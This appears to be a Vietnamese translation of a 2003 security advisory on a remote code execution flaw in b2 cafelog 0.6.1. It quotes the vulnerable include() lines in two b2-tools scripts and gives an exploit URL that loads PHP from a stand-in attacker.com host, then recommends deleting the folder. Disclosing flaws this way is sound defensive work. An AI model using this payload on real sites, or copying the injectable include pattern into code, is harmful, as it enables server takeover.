Lỗi của b2 cafelog 0.6.1
trang này đã được đọc lầnProducts: b2 cafelog 0.6.1
(http://cafelog.com/)
Date: 29 May 2003
Author: pokleyzz <pokleyzz_at_scan-associates.net>
URL: http://www.scan-associates.net
Summary: thi hành lệnh từ xa ở b2 cafelog 0.6.1
Mô tả:
b2 cafelog là một hệ thống blogger viết bằng ngôn ngữ php với mysql ad
database
backend.
Chi tiết:
b2 cafelog 0.6.1 ở thư mục b2-tools có chứa 2 file script php
(blogger-2-b2.php và
gm-2-b2.php) mà cho phép user xác định được $b2inc và thi hành code injection
từ xa.
ở blogger-2-b2.php dòng 21
-----------------------------------------------------
case "step1":
include("b2config.php");
include("$b2inc/b2functions.php");
include("$b2inc/b2vars.php");
------------------------------------------------------------------------------------
ở gm-2-b2.php dòng 5
----------------------------------------------------------
// 3. load in the browser from there
include("b2config.php");
include($b2inc."/b2functions.php");
-----------------------------------------------------------------------------------
Khai thác:
http://blabla.com/b2-tools/gm-2-b2.php?b2i...://attacker.com
attacker.com có file b2functions.php với script php bạn muốn thi hành.
Giải pháp:
Xóa thư mục b2-tools.
